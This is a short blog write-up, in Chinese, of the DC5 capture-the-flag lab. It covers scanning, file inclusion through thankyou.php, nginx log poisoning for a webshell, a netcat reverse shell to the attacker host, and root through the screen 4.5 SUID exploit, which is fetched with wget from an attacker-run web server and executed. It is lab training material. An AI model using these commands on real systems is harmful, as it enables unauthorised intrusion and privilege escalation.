DC5靶机记录
2023-03-09 10:47:00 #WirteUp

DC5 靶机记录

Information

Nmap

1
sudo nmap -p- -sS -A -sV -vv192.168.1.132

image-20230309105108231

Dirseach

1
dirsearch -u http://192.168.1.132/

image-20230309105241131

File://

passwd文件包含可读

image-20230309105650291

nginx日志可读

image-20230309105812766

UploadWebShell

Webshell->NginxLog

image-20230309105917653

GetWebShell

image-20230309110055804

Whoami(www-data)

image-20230309110134373

GetShell

反弹Shell

1
2
Kali:nc -lvnp 5555
Dc5:nc -c sh 192.168.1.117 5555

image-20230309110546777

TTYShell

1
python -c 'import pty; pty.spawn("/bin/bash")'

image-20230309110743554

SUID - screen4.5 提权

1
find / -user root -perm /4000 2>/dev/null

image-20230309110835751

Searchsploit

1
searchsploit screen 4.5

image-20230309111002127

GetPocFile

1
2
3
Kali:
cd /usr/share/exploitdb/exploits/linux/local/
python3 -m http.server 7777

image-20230309111319948

1
2
3
4
Kali(Dc5shell):
cd /tmp
wget http://192.168.1.117:7777/41154.sh

image-20230309111631960

Pwn!

1
2
3
4
Kali((Dc5shell):
chmod +x 41154.sh
./41154.sh
whoami->root

image-20230309111829973

Flag!

1
find / -name "*flag*"

image-20230309112023303

1
cat /root/thisistheflag.txt

image-20230309112058989

Sum-up

1
2
3
4
Nmap->80(nginx)
Dirseach->thankyou.php文件包含
Nginxlog->get webshell
SUID提权->screen4.5->root
上一页
2023-03-09 10:47:00 #WirteUp